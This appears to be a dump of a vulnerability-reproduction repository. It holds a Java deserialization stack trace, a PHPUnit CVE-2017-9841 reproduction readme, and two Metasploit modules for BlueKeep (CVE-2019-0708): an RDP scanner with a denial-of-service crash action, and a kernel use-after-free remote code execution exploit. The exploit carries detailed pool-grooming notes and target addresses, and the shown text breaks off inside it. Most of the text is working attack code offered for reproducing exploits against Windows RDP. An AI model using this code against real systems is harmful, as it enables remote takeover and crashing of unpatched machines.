org.codehaus.groovy.runtime.ConvertedClosure (no security manager: RMI class loader disabled) 164 | at sun.rmi.registry.RegistryImpl_Skel.dispatch(Unknown Source) 165 | at sun.rmi.server.UnicastServerRef.oldDispatch(UnicastServerRef.java:409) 166 | at sun.rmi.server.UnicastServerRef.dispatch(UnicastServerRef.java:267) 167 | at sun.rmi.transport.Transport$2.run(Transport.java:202) 168 | at sun.rmi.transport.Transport$2.run(Transport.java:199) 169 | at java.security.AccessController.doPrivileged(Native Method) 170 | at sun.rmi.transport.Transport.serviceCall(Transport.java:198) 171 | at sun.rmi.transport.tcp.TCPTransport.handleMessages(TCPTransport.java:567) 172 | at sun.rmi.transport.tcp.TCPTransport$ConnectionHandler.run0(TCPTransport.java:828) 173 | at sun.rmi.transport.tcp.TCPTransport$ConnectionHandler.access$400(TCPTransport.java:619) 174 
| at sun.rmi.transport.tcp.TCPTransport$ConnectionHandler$1.run(TCPTransport.java:684) 175 | at sun.rmi.transport.tcp.TCPTransport$ConnectionHandler$1.run(TCPTransport.java:681) 176 | at java.security.AccessController.doPrivileged(Native Method) 177 | at sun.rmi.transport.tcp.TCPTransport$ConnectionHandler.run(TCPTransport.java:681) 178 | at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1145) 179 | at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:615) 180 | at java.lang.Thread.run(Thread.java:745) 181 | Caused by: java.lang.ClassNotFoundException: org.codehaus.groovy.runtime.ConvertedClosure (no security manager: RMI class loader disabled) 182 | at sun.rmi.server.LoaderHandler.loadClass(LoaderHandler.java:393) 183 | at sun.rmi.server.LoaderHandler.loadClass(LoaderHandler.java:185) 184 | at java.rmi.server.RMIClassLoader$2.loadClass(RMIClassLoader.java:637) 185 | at java.rmi.server.RMIClassLoader.loadClass(RMIClassLoader.java:264) 186 | at sun.rmi.server.MarshalInputStream.resolveClass(MarshalInputStream.java:214) 187 | at java.io.ObjectInputStream.readNonProxyDesc(ObjectInputStream.java:1612) 188 | at java.io.ObjectInputStream.readClassDesc(ObjectInputStream.java:1517) 189 | at java.io.ObjectInputStream.readOrdinaryObject(ObjectInputStream.java:1771) 190 | at java.io.ObjectInputStream.readObject0(ObjectInputStream.java:1350) 191 | at java.io.ObjectInputStream.defaultReadFields(ObjectInputStream.java:1990) 192 | at java.io.ObjectInputStream.readSerialData(ObjectInputStream.java:1915) 193 | at java.io.ObjectInputStream.readOrdinaryObject(ObjectInputStream.java:1798) 194 | at java.io.ObjectInputStream.readObject0(ObjectInputStream.java:1350) 195 | at java.io.ObjectInputStream.defaultReadFields(ObjectInputStream.java:1990) 196 | at java.io.ObjectInputStream.defaultReadObject(ObjectInputStream.java:500) 197 | at sun.reflect.annotation.AnnotationInvocationHandler.readObject(AnnotationInvocationHandler.java:427) 198 
| at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method) 199 | at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:57) 200 | at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43) 201 | at java.lang.reflect.Method.invoke(Method.java:606) 202 | at java.io.ObjectStreamClass.invokeReadObject(ObjectStreamClass.java:1017) 203 | at java.io.ObjectInputStream.readSerialData(ObjectInputStream.java:1893) 204 | at java.io.ObjectInputStream.readOrdinaryObject(ObjectInputStream.java:1798) 205 | at java.io.ObjectInputStream.readObject0(ObjectInputStream.java:1350) 206 | at java.io.ObjectInputStream.readObject(ObjectInputStream.java:370) 207 | at java.util.HashMap.readObject(HashMap.java:1180) 208 | at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method) 209 | at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:57) 210 | at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43) 211 | at java.lang.reflect.Method.invoke(Method.java:606) 212 | at java.io.ObjectStreamClass.invokeReadObject(ObjectStreamClass.java:1017) 213 | at java.io.ObjectInputStream.readSerialData(ObjectInputStream.java:1893) 214 | at java.io.ObjectInputStream.readOrdinaryObject(ObjectInputStream.java:1798) 215 | at java.io.ObjectInputStream.readObject0(ObjectInputStream.java:1350) 216 | at java.io.ObjectInputStream.defaultReadFields(ObjectInputStream.java:1990) 217 | at java.io.ObjectInputStream.defaultReadObject(ObjectInputStream.java:500) 218 | at sun.reflect.annotation.AnnotationInvocationHandler.readObject(AnnotationInvocationHandler.java:427) 219 | at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method) 220 | at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:57) 221 | at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43) 222 | at java.lang.reflect.Method.invoke(Method.java:606) 223 | at 
java.io.ObjectStreamClass.invokeReadObject(ObjectStreamClass.java:1017) 224 | at java.io.ObjectInputStream.readSerialData(ObjectInputStream.java:1893) 225 | at java.io.ObjectInputStream.readOrdinaryObject(ObjectInputStream.java:1798) 226 | at java.io.ObjectInputStream.readObject0(ObjectInputStream.java:1350) 227 | at java.io.ObjectInputStream.defaultReadFields(ObjectInputStream.java:1990) 228 | at java.io.ObjectInputStream.readSerialData(ObjectInputStream.java:1915) 229 | at java.io.ObjectInputStream.readOrdinaryObject(ObjectInputStream.java:1798) 230 | at java.io.ObjectInputStream.readObject0(ObjectInputStream.java:1350) 231 | at java.io.ObjectInputStream.readObject(ObjectInputStream.java:370) 232 | ... 17 more 233 | ``` 234 | 235 | # 0x07 参考链接 236 | https://blog.csdn.net/littlehaes/article/details/104451590 237 | https://gv7.me/articles/2018/CVE-2016-8735/ 238 | https://github.com/frohoff/ysoserial 239 | http://cn.voidcc.com/question/p-zmdzyjue-bbh.html 240 | -------------------------------------------------------------------------------- /2020_11_13_Microsoft SQL Server Reporting Services权限提升漏洞复现(CVE-2020-0618)/readme.md: -------------------------------------------------------------------------------- 1 | 此篇文章之前已投稿到先知社区,此处不再赘述,地址:https://xz.aliyun.com/t/7891 2 | -------------------------------------------------------------------------------- /2020_11_13_PHPUnit远程代码执行漏洞复现(CVE-2017-9841)/0.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/safesword/WebExp/1987e403734000d6346135fbd789ceb34b03ddde/2020_11_13_PHPUnit远程代码执行漏洞复现(CVE-2017-9841)/0.png -------------------------------------------------------------------------------- /2020_11_13_PHPUnit远程代码执行漏洞复现(CVE-2017-9841)/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/safesword/WebExp/1987e403734000d6346135fbd789ceb34b03ddde/2020_11_13_PHPUnit远程代码执行漏洞复现(CVE-2017-9841)/1.png 
-------------------------------------------------------------------------------- /2020_11_13_PHPUnit远程代码执行漏洞复现(CVE-2017-9841)/readme.md: -------------------------------------------------------------------------------- 1 | # 0x00 软件介绍 2 | PHPUnit:一款php下软件测试常用的框架 3 | 4 | # 0x01 复现环境 5 | 使用环境:vulhub中的环境 6 | 复现版本:PHPUnit 5.6.2 7 | 8 | # 0x02 环境搭建 9 | 靶机环境:Ubuntu 18.04.5 LTS 10 | 11 | cd ./vulhub-master/ 12 | cd ./phpunit/ 13 | cd ./CVE-2017-9841/ 14 | docker-compose build 15 | docker-compose up -d 16 | 17 | # 0x03 利用条件 18 | 使用composer安装受影响版本的PHPUnit 19 | 20 | # 0x04 影响版本 21 | 4.8.19 <= PHPUnit <= 4.8.27 22 | 5.0.10 <= PHPUnit <= 5.6.2 23 | 24 | # 0x05 漏洞复现 25 | 攻击环境:kali_x64_en-us 26 | 27 | 访问http://ybdt.best:8080/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 28 | 直接在请求中添加 29 | ``` 30 | 31 | ``` 32 | 如下图 33 | ![image](./0.png) 34 | 结果如下 35 | ![image](./1.png) 36 | 37 | # 0x06 踩坑记录 38 | 坑1: 39 | 在本地搭建环境,网络可能会非常非常慢,建议找一台云服务器 40 | 41 | # 0x07 参考链接 42 | 无 43 | -------------------------------------------------------------------------------- /2020_11_13_iis6.0(cve-2017-7269)最完整的利用,从远程利用,到本地提权,再到常见失败原因/readme.md: -------------------------------------------------------------------------------- 1 | 此篇文章之前已投稿到先知社区,此处不再赘述,地址:https://xz.aliyun.com/t/6485 2 | -------------------------------------------------------------------------------- /2020_11_15_Windows RDP服务远程代码执行漏洞复现(CVE-2019-0708)-BlueKeep/cve_2019_0708_bluekeep.rb: -------------------------------------------------------------------------------- 1 | ## 2 | # This module requires Metasploit: https://metasploit.com/download 3 | # Current source: https://github.com/rapid7/metasploit-framework 4 | ## 5 | 6 | class MetasploitModule < Msf::Auxiliary 7 | include Msf::Exploit::Remote::RDP 8 | include Msf::Auxiliary::Scanner 9 | include Msf::Auxiliary::Report 10 | 11 | def initialize(info = {}) 12 | super(update_info(info, 13 | 'Name' => 'CVE-2019-0708 BlueKeep Microsoft Remote Desktop RCE Check', 14 | 'Description' => %q{ 15 | 
This module checks a range of hosts for the CVE-2019-0708 vulnerability 16 | by binding the MS_T120 channel outside of its normal slot and sending 17 | non-DoS packets which respond differently on patched and vulnerable hosts. 18 | It can optionally trigger the DoS vulnerability. 19 | }, 20 | 'Author' => 21 | [ 22 | 'National Cyber Security Centre', # Discovery 23 | 'JaGoTu', # Module 24 | 'zerosum0x0', # Module 25 | 'Tom Sellers' # TLS support, packet documenentation, DoS implementation 26 | ], 27 | 'References' => 28 | [ 29 | [ 'CVE', '2019-0708' ], 30 | [ 'URL', 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708' ] 31 | ], 32 | 'DisclosureDate' => '2019-05-14', 33 | 'License' => MSF_LICENSE, 34 | "Actions" => [ 35 | ["Scan", "Description" => "Scan for exploitable targets"], 36 | ["Crash", "Description" => "Trigger denial of service vulnerability"], 37 | ], 38 | "DefaultAction" => "Scan", 39 | 'Notes' => 40 | { 41 | 'Stability' => [ CRASH_SAFE ], 42 | 'AKA' => ['BlueKeep'] 43 | } 44 | )) 45 | end 46 | 47 | def report_goods 48 | report_vuln( 49 | :host => rhost, 50 | :port => rport, 51 | :proto => 'tcp', 52 | :name => self.name, 53 | :info => 'Behavior indicates a missing Microsoft Windows RDP patch for CVE-2019-0708', 54 | :refs => self.references 55 | ) 56 | end 57 | 58 | def run_host(ip) 59 | # Allow the run command to call the check command 60 | 61 | status = check_host(ip) 62 | if status == Exploit::CheckCode::Vulnerable 63 | print_good(status[1].to_s) 64 | elsif status == Exploit::CheckCode::Unsupported # used to display custom msg error 65 | status = Exploit::CheckCode::Safe 66 | print_status("The target service is not running or refused our connection.") 67 | else 68 | print_status(status[1].to_s) 69 | end 70 | 71 | status 72 | end 73 | 74 | def rdp_reachable 75 | rdp_connect 76 | rdp_disconnect 77 | return true 78 | rescue Rex::ConnectionRefused 79 | return false 80 | rescue Rex::ConnectionTimeout 81 | return false 82 | end 
83 | 84 | def check_host(_ip) 85 | # The check command will call this method instead of run_host 86 | status = Exploit::CheckCode::Unknown 87 | 88 | begin 89 | begin 90 | rdp_connect 91 | rescue ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError 92 | return Exploit::CheckCode::Unsupported # used to display custom msg error 93 | end 94 | 95 | status = check_rdp_vuln 96 | rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError, ::TypeError => e 97 | bt = e.backtrace.join("\n") 98 | vprint_error("Unexpected error: #{e.message}") 99 | vprint_line(bt) 100 | elog("#{e.message}\n#{bt}") 101 | rescue RdpCommunicationError 102 | vprint_error("Error communicating RDP protocol.") 103 | status = Exploit::CheckCode::Unknown 104 | rescue Errno::ECONNRESET 105 | vprint_error("Connection reset") 106 | rescue => e 107 | bt = e.backtrace.join("\n") 108 | vprint_error("Unexpected error: #{e.message}") 109 | vprint_line(bt) 110 | elog("#{e.message}\n#{bt}") 111 | ensure 112 | rdp_disconnect 113 | end 114 | 115 | status 116 | end 117 | 118 | def check_for_patch 119 | begin 120 | 6.times do 121 | _res = rdp_recv 122 | end 123 | rescue RdpCommunicationError 124 | # we don't care 125 | end 126 | 127 | # The loop below sends Virtual Channel PDUs (2.2.6.1) that vary in length 128 | # The arch governs which of the packets triggers the desired response 129 | # which is an MCS Disconnect Provider Ultimatum or a timeout. 130 | 131 | # Disconnect Provider message of a valid size for each platform 132 | # has proven to be safe to send as part of the vulnerability check. 
133 | x86_string = "00000000020000000000000000000000" 134 | x64_string = "0000000000000000020000000000000000000000000000000000000000000000" 135 | 136 | if action.name == 'Crash' 137 | vprint_status("Sending denial of service payloads") 138 | # Length and chars are arbitrary but total length needs to be longer than 139 | # 16 for x86 and 32 for x64. Making the payload too long seems to cause 140 | # the DoS to fail. Note that sometimes the DoS seems to fail. Increasing 141 | # the payload size and sending more of them doesn't seem to improve the 142 | # reliability. It *seems* to happen more often on x64, I haven't seen it 143 | # fail against x86. Repeated attempts will generally trigger the DoS. 144 | x86_string += "FF" * 1 145 | x64_string += "FF" * 2 146 | else 147 | vprint_status("Sending patch check payloads") 148 | end 149 | 150 | chan_flags = RDPConstants::CHAN_FLAG_FIRST | RDPConstants::CHAN_FLAG_LAST 151 | channel_id = [1005].pack('S>') 152 | x86_packet = rdp_build_pkt(build_virtual_channel_pdu(chan_flags, [x86_string].pack("H*")), channel_id) 153 | 154 | x64_packet = rdp_build_pkt(build_virtual_channel_pdu(chan_flags, [x64_string].pack("H*")), channel_id) 155 | 156 | 6.times do 157 | rdp_send(x86_packet) 158 | rdp_send(x64_packet) 159 | 160 | # A single pass should be sufficient to cause DoS 161 | if action.name == 'Crash' 162 | sleep(1) 163 | rdp_disconnect 164 | 165 | sleep(5) 166 | if rdp_reachable 167 | print_error("Target doesn't appear to have been crashed. Consider retrying.") 168 | return Exploit::CheckCode::Unknown 169 | else 170 | print_good("Target service appears to have been successfully crashed.") 171 | return Exploit::CheckCode::Vulnerable 172 | end 173 | end 174 | 175 | # Quick check for the Ultimatum PDU 176 | begin 177 | res = rdp_recv(-1, 1) 178 | rescue EOFError 179 | # we don't care 180 | end 181 | return Exploit::CheckCode::Vulnerable if res&.include?(["0300000902f0802180"].pack("H*")) 182 | 183 | # Slow check for Ultimatum PDU. 
If it doesn't respond in a timely 184 | # manner then the host is likely patched. 185 | begin 186 | 4.times do 187 | res = rdp_recv 188 | # 0x2180 = MCS Disconnect Provider Ultimatum PDU - 2.2.2.3 189 | if res.include?(["0300000902f0802180"].pack("H*")) 190 | return Exploit::CheckCode::Vulnerable 191 | end 192 | end 193 | rescue RdpCommunicationError 194 | # we don't care 195 | end 196 | end 197 | 198 | Exploit::CheckCode::Safe 199 | end 200 | 201 | def check_rdp_vuln 202 | # check if rdp is open 203 | is_rdp, version_info = rdp_fingerprint 204 | unless is_rdp 205 | vprint_status "Could not connect to RDP service." 206 | return Exploit::CheckCode::Unknown 207 | end 208 | rdp_disconnect 209 | rdp_connect 210 | is_rdp, server_selected_proto = rdp_check_protocol 211 | 212 | requires_nla = [RDPConstants::PROTOCOL_HYBRID, RDPConstants::PROTOCOL_HYBRID_EX].include? server_selected_proto 213 | product_version = (version_info && version_info[:product_version]) ? version_info[:product_version] : 'N/A' 214 | info = "Detected RDP on #{peer} (Windows version: #{product_version})" 215 | 216 | service_info = "Requires NLA: #{(!version_info[:product_version].nil? && requires_nla) ? 
'Yes' : 'No'}" 217 | info << " (#{service_info})" 218 | 219 | print_status(info) 220 | 221 | if requires_nla 222 | vprint_status("Server requires NLA (CredSSP) security which mitigates this vulnerability.") 223 | return Exploit::CheckCode::Safe 224 | end 225 | 226 | chans = [ 227 | ['cliprdr', RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP | RDPConstants::CHAN_COMPRESS_RDP | RDPConstants::CHAN_SHOW_PROTOCOL], 228 | ['MS_T120', RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_COMPRESS_RDP], 229 | ['rdpsnd', RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP], 230 | ['snddbg', RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP], 231 | ['rdpdr', RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_COMPRESS_RDP], 232 | ] 233 | 234 | success = rdp_negotiate_security(chans, server_selected_proto) 235 | return Exploit::CheckCode::Unknown unless success 236 | 237 | rdp_establish_session 238 | 239 | result = check_for_patch 240 | 241 | if result == Exploit::CheckCode::Vulnerable 242 | report_goods 243 | end 244 | 245 | # Can't determine, but at least we know the service is running 246 | result 247 | end 248 | 249 | end 250 | -------------------------------------------------------------------------------- /2020_11_15_Windows RDP服务远程代码执行漏洞复现(CVE-2019-0708)-BlueKeep/cve_2019_0708_bluekeep_rce.rb: -------------------------------------------------------------------------------- 1 | ## 2 | # This module requires Metasploit: https://metasploit.com/download 3 | # Current source: https://github.com/rapid7/metasploit-framework 4 | ## 5 | 6 | # Exploitation and Caveats from zerosum0x0: 7 | # 8 | # 1. Register with channel MS_T120 (and others such as RDPDR/RDPSND) nominally. 9 | # 2. Perform a full RDP handshake, I like to wait for RDPDR handshake too (code in the .py) 10 | # 3. Free MS_T120 with the DisconnectProviderIndication message to MS_T120. 11 | # 4. RDP has chunked messages, so we use this to groom. 12 | # a. 
Chunked messaging ONLY works properly when sent to RDPSND/MS_T120. 13 | # b. However, on 7+, MS_T120 will not work and you have to use RDPSND. 14 | # i. RDPSND only works when 15 | # HKLM\SYSTEM\CurrentControlSet\Control\TerminalServer\Winstations\RDP-Tcp\fDisableCam = 0 16 | # ii. This registry key is not a default setting for server 2008 R2. SHITTY ISSUE 17 | # 5. Use chunked grooming to fit new data in the freed channel, account for 18 | # the allocation header size (like 0x38 I think?). At offset 0x100? is where 19 | # the "call [rax]" gadget will get its pointer from. 20 | # a. The NonPagedPool (NPP) starts at a fixed address on XP-7 21 | # i. Hot-swap memory is another SHITTY ISSUE. With certain VMWare and 22 | # Hyper-V setups, the OS allocates a buncha PTE stuff before the NPP 23 | # start. This can be anywhere from 100 mb to gigabytes of offset 24 | # before the NPP start. 25 | # b. Set offset 0x100 to NPPStart+SizeOfGroomInMB 26 | # c. Groom chunk the shellcode, at *(NPPStart+SizeOfGroomInMB) you need 27 | # [NPPStart+SizeOfGroomInMB+8...payload]... because "call [rax]" is an 28 | # indirect call 29 | # d. We are limited to 0x400 payloads by channel chunk max size. My 30 | # current shellcode is a twin shellcode with eggfinders. I spam the 31 | # kernel payload and user payload, and if user payload is called first it 32 | # will egghunt for the kernel payload. 33 | # 6. After channel hole is filled and the NPP is spammed up with shellcode, 34 | # trigger the free by closing the socket. 35 | # 36 | # TODO: 37 | # * Detect OS specifics / obtain memory leak to determine NPP start address. 38 | # * Write the XP/2003 portions grooming MS_T120. 39 | # * Detect if RDPSND grooming is working or not? 40 | # * Expand channels besides RDPSND/MS_T120 for grooming. 41 | # See https://unit42.paloaltonetworks.com/exploitation-of-windows-cve-2019-0708-bluekeep-three-ways-to-write-data-into-the-kernel-with-rdp-pdu/ 42 | # 43 | # https://github.com/0xeb-bp/bluekeep .. 
# this repo has code for grooming
# MS_T120 on XP... should be same process as the RDPSND

# Remote kernel exploit for CVE-2019-0708 (BlueKeep). Per the notes above:
# bind the internal-only MS_T120 static channel, free it with a Disconnect
# Provider Indication, spray the NonPagedPool through RDP channel chunks so
# the freed object is reclaimed with attacker data, and let the dangling
# indirect call land in the spray.
#
# Operational caveat: the pool base is hard-coded per hypervisor (see the
# target table) and the bug is a kernel use-after-free, hence ManualRanking.
# A GROOMBASE that does not match the victim is liable to bug-check the host
# rather than fail cleanly; run the check first and pick the target by hand.
class MetasploitModule < Msf::Exploit::Remote

  Rank = ManualRanking

  # 8-byte markers the twin shellcodes hunt for (notes above, item 5d: the
  # user payload egg-hunts for the kernel payload when it runs first).
  USERMODE_EGG = 0xb00dac0fefe31337
  KERNELMODE_EGG = 0xb00dac0fefe42069

  # Largest payload a single channel chunk can carry (notes above, item 5d).
  CHUNK_SIZE = 0x400
  # Bytes set aside at the front of each chunk; subtracted from the payload
  # 'Space' below and added to the gadget pointer in create_payloads.
  # NOTE(review): the notes above guess 0x38 for the allocation header while
  # the code uses 0x48 — confirm against the target build if the spray misfires.
  HEADER_SIZE = 0x48

  include Msf::Exploit::Remote::RDP
  # Presumably delegates `check` to the auxiliary scanner named in
  # DefaultOptions['CheckScanner'] below.
  include Msf::Exploit::Remote::CheckScanner

  # Module metadata. Every concrete target is Windows 7 SP1 / 2008 R2 x64 and
  # differs only in 'GROOMBASE', the NonPagedPool start address under a given
  # hypervisor; target 0 fingerprints only and is refused by exploit.
  #
  # @param info [Hash] metadata merged by update_info
  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'CVE-2019-0708 BlueKeep RDP Remote Windows Kernel Use After Free',
      'Description' => %q(
        The RDP termdd.sys driver improperly handles binds to internal-only channel MS_T120,
        allowing a malformed Disconnect Provider Indication message to cause use-after-free.
        With a controllable data/size remote nonpaged pool spray, an indirect call gadget of
        the freed channel is used to achieve arbitrary code execution.
      ),
      'Author'      =>
        [
          # NOTE(review): the author e-mail addresses appear to have been
          # stripped from this copy of the file.
          'Sean Dillon ', # @zerosum0x0 - Original exploit
          'Ryan Hanson ', # @ryHanson - Original exploit
          'OJ Reeves ', # @TheColonial - Metasploit module
          'Brent Cook ', # @busterbcook - Assembly whisperer
        ],
      'License'     => MSF_LICENSE,
      'References'  =>
        [
          ['CVE', '2019-0708'],
          ['URL', 'https://github.com/zerosum0x0/CVE-2019-0708'],
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread',
          'WfsDelay' => 5,
          'RDP_CLIENT_NAME' => 'ethdev',
          # Scanner module used for `check` in exploit.
          'CheckScanner' => 'auxiliary/scanner/rdp/cve_2019_0708_bluekeep'
        },
      'Privileged'  => true,
      'Payload'     =>
        {
          # One chunk minus the reserved header; see create_payloads.
          'Space' => CHUNK_SIZE - HEADER_SIZE,
          'EncoderType' => Msf::Encoder::Type::Raw,
        },
      'Platform'    => 'win',
      'Targets'     =>
        [
          [
            'Automatic targeting via fingerprinting',
            {
              'Arch' => [ARCH_X64],
              # No GROOMBASE here; exploit bails out on this flag.
              'FingerprintOnly' => true
            },
          ],
          #
          #
          # Windows 2008 R2 requires the following registry change from default:
          #
          # [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Terminal Server\WinStations\rdpwd]
          # "fDisableCam"=dword:00000000
          #
          [
            'Windows 7 SP1 / 2008 R2 (6.1.7601 x64)',
            {
              'Platform' => 'win',
              'Arch' => [ARCH_X64],
              'GROOMBASE' => 0xfffffa8003800000
            }
          ],
          [
            # This works with Virtualbox 6
            'Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Virtualbox)',
            {
              'Platform' => 'win',
              'Arch' => [ARCH_X64],
              'GROOMBASE' => 0xfffffa8002407000
            }
          ],
          [
            # This address works on VMWare 15 on Windows.
            'Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare)',
            {
              'Platform' => 'win',
              'Arch' => [ARCH_X64],
              'GROOMBASE' => 0xfffffa8018C00000
              #'GROOMBASE' => 0xfffffa801C000000
            }
          ],
          [
            'Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Hyper-V)',
            {
              'Platform' => 'win',
              'Arch' => [ARCH_X64],
              'GROOMBASE' => 0xfffffa8102407000
            }
          ],
        ],
      'DefaultTarget' => 0,
      'DisclosureDate' => 'May 14 2019',
      'Notes' =>
        {
          'AKA' => ['Bluekeep']
        }
    ))

    # Groom knobs. GROOMSIZE (MB) is added to the target's GROOMBASE to form
    # the address the freed object's indirect call is pointed at (see
    # rdp_on_core_client_id_confirm). GROOMCHANNEL should be RDPSND on 7+ /
    # 2008 R2 (notes above, item 4b, with fDisableCam = 0); MS_T120 grooming
    # is the XP/2003 path the notes list as TODO.
    register_advanced_options(
      [
        OptBool.new('ForceExploit', [false, 'Override check result', false]),
        OptInt.new('GROOMSIZE', [true, 'Size of the groom in MB', 250]),
        OptEnum.new('GROOMCHANNEL', [true, 'Channel to use for grooming', 'RDPSND', ['RDPSND', 'MS_T120']]),
        OptInt.new('GROOMCHANNELCOUNT', [true, 'Number of channels to groom', 1]),
      ]
    )
  end

  # Exploit entry point: requires a Vulnerable check verdict (or ForceExploit),
  # refuses the fingerprint-only target, connects, rejects NLA (CredSSP)
  # servers, negotiates the static channel list with MS_T120 last, establishes
  # the session and enters the dispatch loop. The groom itself runs from
  # rdp_on_core_client_id_confirm once the client id is confirmed.
  #
  # Fails via fail_with with NotVulnerable, BadConfig (automatic target or
  # NLA), Unreachable, or Unknown (security negotiation).
  def exploit
    # ForceExploit bypasses the scanner verdict; against a kernel UAF that is
    # a deliberate decision to risk crashing the host.
    unless check == CheckCode::Vulnerable || datastore['ForceExploit']
      fail_with(Failure::NotVulnerable, 'Set ForceExploit to override')
    end

    # Target 0 carries no GROOMBASE; exploitation needs a hand-picked target.
    if target['FingerprintOnly']
      fail_with(Msf::Module::Failure::BadConfig, 'Set the most appropriate target manually')
    end

    begin
      rdp_connect
    rescue ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout,
           Rex::ConnectionRefused, ::Timeout::Error, ::EOFError
      fail_with(Msf::Module::Failure::Unreachable, 'Unable to connect to RDP service')
    end

    is_rdp, server_selected_proto = rdp_check_protocol
    unless is_rdp
      fail_with(Msf::Module::Failure::Unreachable, 'Unable to connect to RDP service')
    end

    # We don't currently support NLA in the mixin or the exploit. However, if we have valid creds, NLA shouldn't stop us
    # from exploiting the target.
    if [RDPConstants::PROTOCOL_HYBRID, RDPConstants::PROTOCOL_HYBRID_EX].include?(server_selected_proto)
      fail_with(Msf::Module::Failure::BadConfig, 'Server requires NLA (CredSSP) security which mitigates this vulnerability.')
    end

    # Static channel list. Order matters: rdpdr first (its CLIENTID_CONFIRM
    # kicks off the groom and the groom channels are addressed relative to
    # it), two copies of the groom channel, filler channels, and MS_T120 last
    # so its id can be derived from the list length below.
    chans = [
      ['rdpdr', RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP | RDPConstants::CHAN_COMPRESS_RDP],
      [datastore['GROOMCHANNEL'], RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP],
      [datastore['GROOMCHANNEL'], RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP],
      ['MS_XXX0', RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP | RDPConstants::CHAN_COMPRESS_RDP | RDPConstants::CHAN_SHOW_PROTOCOL],
      ['MS_XXX1', RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP | RDPConstants::CHAN_COMPRESS_RDP | RDPConstants::CHAN_SHOW_PROTOCOL],
      ['MS_XXX2', RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP | RDPConstants::CHAN_COMPRESS_RDP | RDPConstants::CHAN_SHOW_PROTOCOL],
      ['MS_XXX3', RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP | RDPConstants::CHAN_COMPRESS_RDP | RDPConstants::CHAN_SHOW_PROTOCOL],
      ['MS_XXX4', RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP | RDPConstants::CHAN_COMPRESS_RDP | RDPConstants::CHAN_SHOW_PROTOCOL],
      ['MS_XXX5', RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP | RDPConstants::CHAN_COMPRESS_RDP | RDPConstants::CHAN_SHOW_PROTOCOL],
      ['MS_T120', RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP | RDPConstants::CHAN_COMPRESS_RDP | RDPConstants::CHAN_SHOW_PROTOCOL],
    ]

    # Assumes static channel ids start at 1004 and follow registration order,
    # so the last entry (MS_T120) is 1004 + (length - 1). Presumed from the
    # arithmetic; re-check against the mixin if the list is ever reordered.
    @mst120_chan_id = 1004 + chans.length - 1

    unless rdp_negotiate_security(chans, server_selected_proto)
      fail_with(Msf::Module::Failure::Unknown, 'Negotiation of security failed.')
    end

    rdp_establish_session

    # Presumably blocks here dispatching incoming PDUs;
    # rdp_on_core_client_id_confirm below is the callback that does the work.
    rdp_dispatch_loop
  end

  private

  # This function is invoked when the PAKID_CORE_CLIENTID_CONFIRM message is
  # received on a channel, and this is when we need to kick off our exploit.
  #
  # Sequence, mirroring the notes at the top of the file: compute the spray
  # address, build the two egg payloads, spray chunks, free MS_T120 in the
  # middle of a spray so a chunk reclaims the hole, keep spraying, flood the
  # NonPagedPool with eggs, then terminate so the freed object gets used.
  #
  # @param pkt, user, chan_id, flags, data — handed straight to super;
  #   chan_id is the channel the confirm arrived on (rdpdr, going by the
  #   chans order in exploit)
  def rdp_on_core_client_id_confirm(pkt, user, chan_id, flags, data)
    # We have to do the default behaviour first.
    super(pkt, user, chan_id, flags, data)

    groom_size = datastore['GROOMSIZE']
    # CHUNK_SIZE * 1024 is exactly 1 MiB, so this is GROOMBASE + GROOMSIZE MiB:
    # the NPP address the freed channel's indirect call will be pointed at
    # (notes above, item 5b).
    pool_addr = target['GROOMBASE'] + (CHUNK_SIZE * 1024 * groom_size)
    groom_chan_count = datastore['GROOMCHANNELCOUNT']

    payloads = create_payloads(pool_addr)

    print_status("Using CHUNK grooming strategy. Size #{groom_size}MB, target address 0x#{pool_addr.to_s(16)}, Channel count #{groom_chan_count}.")

